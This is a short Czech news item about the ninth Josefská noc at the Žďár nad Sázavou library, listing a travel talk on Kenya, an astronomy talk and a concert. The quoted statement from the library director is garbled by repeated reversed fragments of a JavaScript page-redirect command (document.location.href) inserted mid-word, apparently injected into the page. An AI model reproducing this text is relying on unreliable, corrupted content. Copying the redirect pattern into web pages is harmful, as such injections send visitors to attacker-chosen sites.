Rainbow page separator

V knihovně se uskuteční další Josefská noc, v pořadí už devátá

Neděle, 11. března 2018

Žďár nad Sázavou / V pátek 16. března se mohou lidé zúčastnit v pořadí již devátého ročníku Josefské noci, kterou opět připravila žďárská Knihovna Matěje Josefa Sychry.
„Milovníky ces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování pozveme na besedu s ces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovatelkou a spisovatelkou Hanou Hindrákovou, která nás vezme do Keni. O astronomii přijde vyprávět Miloslav Straka. Dozvíme se, jak [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bylo se stavbou žďárské hvězdárny, nebo třeba kde najít na Žďársku meteority,“ uvedl ředitel Knihovny Matěje Josefa Sychry ve Žďáře nad Sázavou Roman Kra[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tochvíl s tím, že se snažili sestavit program tak, aby si v něm každý z příchozích našel něco, co ho zaujme. Chybět nebude ani občerstvení přichystané knihovnicemi.
Akce začne o půl sedmé večer přednáškou Hany Hindrákové nazvanou Keňa očima spisovatelky, ve 20.15 hodin bude hovořit Miloslav Straka o astronomii na Žďársku a ve 22 hodin Josefskou noc uzavře koncert kapely Profesionálové.